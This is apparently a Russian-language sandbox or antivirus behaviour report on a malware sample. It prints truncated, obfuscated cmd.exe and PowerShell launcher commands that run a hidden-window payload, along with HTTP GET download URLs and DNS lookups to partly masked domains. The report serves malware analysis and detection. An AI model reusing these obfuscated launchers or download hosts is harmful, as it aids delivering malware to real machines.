Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cmD/c "set kOfN=$7af = [cHaR[ ]] "))93]RaHc[,63]RaHc[f- )')(d'+'nE'+'otdAer'+'.)'+')IIcsA::'+']gnIdocNe.'+'TXEt['+' ,)'+' '+') SsERp'+'mOCED::'+']e'+'dO'+'mNo'+'isS'+'Er'+'PMOC.NoIS'+'SEr...
Сетевая активность
Подключается к
- 'ca##omax.ru':80
- 'ca##omax.ru':443
- 'ie######todecielo.edu.co':80
TCP
Запросы HTTP GET
- http://ca##omax.ru/jGudFrU
- http://ie######todecielo.edu.co/9ToeEUowUq
Другие
- 'ca##omax.ru':443
UDP
- DNS ASK ar####couture.com
- DNS ASK ca##omax.ru
- DNS ASK lo#######nesspromotion.co.uk
- DNS ASK ie######todecielo.edu.co
- DNS ASK ec##nom.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cmD/c "set kOfN=$7af = [cHaR[ ]] "))93]RaHc[,63]RaHc[f- )')(d'+'nE'+'otdAer'+'.)'+')IIcsA::'+']gnIdocNe.'+'TXEt['+' ,)'+' '+') SsERp'+'mOCED::'+']e'+'dO'+'mNo'+'isS'+'Er'+'PMOC.NoIS'+'SEr...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "set kOfN=$7af = [cHaR[ ]] "))93]RaHc[,63]RaHc[f- )')(d'+'nE'+'otdAer'+'.)'+')IIcsA::'+']gnIdocNe.'+'TXEt['+' ,)'+' '+') SsERp'+'mOCED::'+']e'+'dO'+'mNo'+'isS'+'Er'+'PMOC.NoIS'+'SErPMoC.o...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (.('Gv') ( \"{0}{1}\" -f'eX*','XT' ) -VAlUE ).\"invOK`EcO`mm`AND\".( \"{1}{2}{0}\" -f 'EScrIPT','iN','VoK' ).Invoke( (.(\"{0}{1}\"-f'IT','EM' ) ( \"{0}{2}{1}\"-f'en','n','v:Kof') ).\"val`U...
